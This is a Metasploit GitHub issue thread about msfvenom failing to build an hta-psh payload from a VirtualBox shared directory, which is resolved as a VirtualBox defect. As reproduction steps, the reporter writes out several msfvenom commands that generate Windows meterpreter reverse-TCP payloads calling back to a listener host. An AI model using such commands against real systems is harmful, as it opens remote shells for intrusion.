### ISSUE TITLE
hta-psh payload creation fails

### ISSUE THREAD

**Issue by spoppi** [rapid7/metasploit-framework#10483] opened 2018-08-19 14:36 UTC
## Steps to reproduce

How'd you do it?

1. Create a hta-psh payload using msfvenom:
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.2.3.4 LPORT=4444 -f hta-psh 

## Expected behavior

hta-psh payload should be created without error

## Current behavior

msfvenom throws an exception:
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Error: Protocol error @ rb_sysopen - function dUwR {
        Param ($kYMP, $nWSq)
...

~/.msf4/logs/framework.log
[08/19/2018 16:20:42] [e(0)] core: Errno::EPROTO : Protocol error @ rb_sysopen - function dUwR {
        Param ($kYMP, $nWSq)            
...
/usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/rex-powershell-0.1.78/lib/rex/powershell/script.rb:44:in `initialize'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/rex-powershell-0.1.78/lib/rex/powershell/script.rb:44:in `new'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/rex-powershell-0.1.78/lib/rex/powershell/script.rb:44:in `initialize'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/rex-powershell-0.1.78/lib/rex/powershell/command.rb:53:in `new'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/rex-powershell-0.1.78/lib/rex/powershell/command.rb:53:in `compress_script'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/rex-powershell-0.1.78/lib/rex/powershell/command.rb:319:in `cmd_psh_payload'
/usr/share/metasploit-framework/lib/msf/util/exe.rb:1407:in `to_powershell_hta'
/usr/share/metasploit-framework/lib/msf/util/exe.rb:2256:in `to_executable_fmt'
/usr/share/metasploit-framework/lib/msf/core/payload_generator.rb:289:in `format_payload'
/usr/share/metasploit-framework/lib/msf/core/payload_generator.rb:351:in `generate_payload'
/usr/bin/msfvenom:387:in `<main>'

### Metasploit version
Framework: 4.17.3-dev
Console  : 4.17.3-dev

### I installed Metasploit with:
- [x ] Kali package via apt

### OS
Kali Linux x64

**Comment by Green-m** [comment] 2018-08-20 03:44
I can not reproduce it, have you try to update the latest version and run again?

**Comment by spoppi** [comment] 2018-08-20 14:05
Hi,

There is no newer version in the kali repository available. I also
reinstalled the package with no avail. I also believe I haven't change
anything outside the package management rg. metasploit, and also tested
with deleting ~/.msf4 with no luck.
Any tips on debugging it for a non-ruby guy?

Thanks

**Comment by spoppi** [comment] 2018-08-20 16:51
After digging deeper it turned out that the creation of hta-psh seems to have issues when msfvenom is started from a virtualbox shared directory (vboxsf on the host).
My kali is running in a virtualbox VM on a Fedora host sharing some directories from the host.
MSF was just updated to 4.17.7-dev today.
When running msfvenom with _-f hta-psh_ from a local directory works as expected while running it from a shared vboxsf directory it throws the exception. I do have write access on the share though. Doing the same with _-f exe_ works in any directory without issues:

### Failed -f hta-psh in shared directory
```
root@kali-htb:/media/sf_Scans/HTB/reel# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.15.185 LPORT=4444 -f hta-psh -o bla.hta
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Error: Protocol error @ rb_sysopen - function lFdpS {
        Param ($e8, $r8Q)
...
```
### Working -f exe in same shared directory
```
root@kali-htb:/media/sf_Scans/HTB/reel# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.15.185 LPORT=4444 -f exe -o bla.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes
Saved as: bla.exe
```
Maybe that helps in resolving the issue.

**Comment by jmartin-r7** [comment] 2018-08-24 18:46
Given the conditions you have described this looks like a `virtualbox tools` bug and not something metasploit-framework has control over.  

This looks to be a long lived defect in virtualbox mounted shares. https://www.virtualbox.org/ticket/4862

Here is a similar issue from a ruby user in 2009 that referred to similar related [issues](https://www.ruby-forum.com/topic/190291).

Closing as not a defect in metasploit.

**Closed by jmartin-r7** 2018-08-24 18:46 UTC

**Comment by pich4ya** [comment] 2021-07-18 19:53
I confirmed that the issue is still persist with Docker's shared folders on MacOS.
